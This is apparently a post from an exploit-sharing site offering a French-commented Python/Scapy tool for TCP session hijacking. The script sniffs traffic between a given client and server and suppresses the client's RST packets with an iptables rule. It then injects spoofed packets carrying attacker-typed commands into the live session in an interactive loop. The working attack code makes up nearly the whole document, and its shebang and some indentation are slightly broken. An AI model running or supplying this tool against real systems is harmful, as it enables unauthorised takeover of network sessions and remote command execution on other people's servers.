TCP Session Hijacking Avancé

Download | Vote Up (2) | Vote Down (0) 
# ANBU :: TCP Session Hijacking Module
# Author: St0rn
#
# argv[1] = ip_client ; argv[2] = ip_serveur ; argv[3] =
# port_serveur ; argv[4] = iface
#
# Bug: Pour garder la connexion, la fonction recupére un seul 
# paquet, si la requete provoque un output trop long 
# (paquets fragmenté) il seront affiché à la prochaine boucle
# => Correction a la prochaine version
# 
#!usr/bin/env/python
     
from scapy.all import *
import sys
import os
     
"""Filtre"""
filtre = "dst host " + sys.argv[1] + " and src host " + sys.argv[2] + " and src port " + sys.argv[3] + " and tcp[tcpflags] & tcp-push != 0"
     
os.system("clear")
     
try:
 os.system("iptables -A OUTPUT -p tcp --tcp-flags RST RST -s " + sys.argv[1] + " -j DROP")
 print("\n [+] iptables rule added for client RST packets\n")
except:
 print("\n [-] iptables rule don't added for client RST packets\n")
     
"""Fonction de vol de session"""
def hijack_session(p):
 print("\n")
     
 
 ether = Ether(dst=p[Ether].src, src=p[Ether].dst)
 ip = IP(src=p[IP].dst, dst=p[IP].src, ihl=p[IP].ihl, flags=p[IP].flags, frag=p[IP].frag, ttl=p[IP].ttl,     proto=p[IP].proto, id=1337)
 tcp = TCP(sport=p[TCP].dport, dport=p[TCP].sport, seq=p[TCP].ack, ack=p[TCP].seq, dataofs=p[TCP].dataofs, reserved=p[TCP].reserved, flags="PA", window=p[TCP].window, options=p[TCP].options)
     
 hijack = ether/ip/tcp/"echo 1337\n"
 sendp(hijack)
 
"""Fonction pour garder la connexion"""    
def perm_session(p):
 os.system("clear")
 if p[Raw].load:
 print(p[Raw].load)
     
 cmd = raw_input("\n> ")
     
 ether = Ether(dst=p[Ether].src, src=p[Ether].dst)
 ip = IP(src=p[IP].dst, dst=p[IP].src, ihl=p[IP].ihl, flags=p[IP].flags, frag=p[IP].frag, ttl=p[IP].ttl,     proto=p[IP].proto, id=1337)
 tcp = TCP(sport=p[TCP].dport, dport=p[TCP].sport, seq=p[TCP].ack, ack=p[TCP].seq, dataofs=p[TCP].dataofs, reserved=p[TCP].reserved, flags="PA", window=p[TCP].window, options=p[TCP].options)
     
 packet = ether/ip/tcp/(cmd+"\n")
 sendp(packet)
     
     
 print(" [*] Hunting TCP Session " + sys.argv[1] + " => " + sys.argv[2] + ":"+ sys.argv[3]+"\n")
   
"""Main"""  
try:
 sniff(count = 1, prn=hijack_session, filter=filtre, lfilter = lambda(f) : f.haslayer(TCP), store=0, iface=sys.argv[4])
except:
 print(" [-] Can't launch sniffer :'(\n")
     
while 1:
 try:
  sniff(count = 1, prn=perm_session, filter=filtre,  lfilter = lambda(f) : f.haslayer(TCP), store=0, iface=sys.argv[4])
 except:
  print(" [-] Can't launch sniffer :'(\n")

St0rn

Be the first to give feedback !
Please login to comment !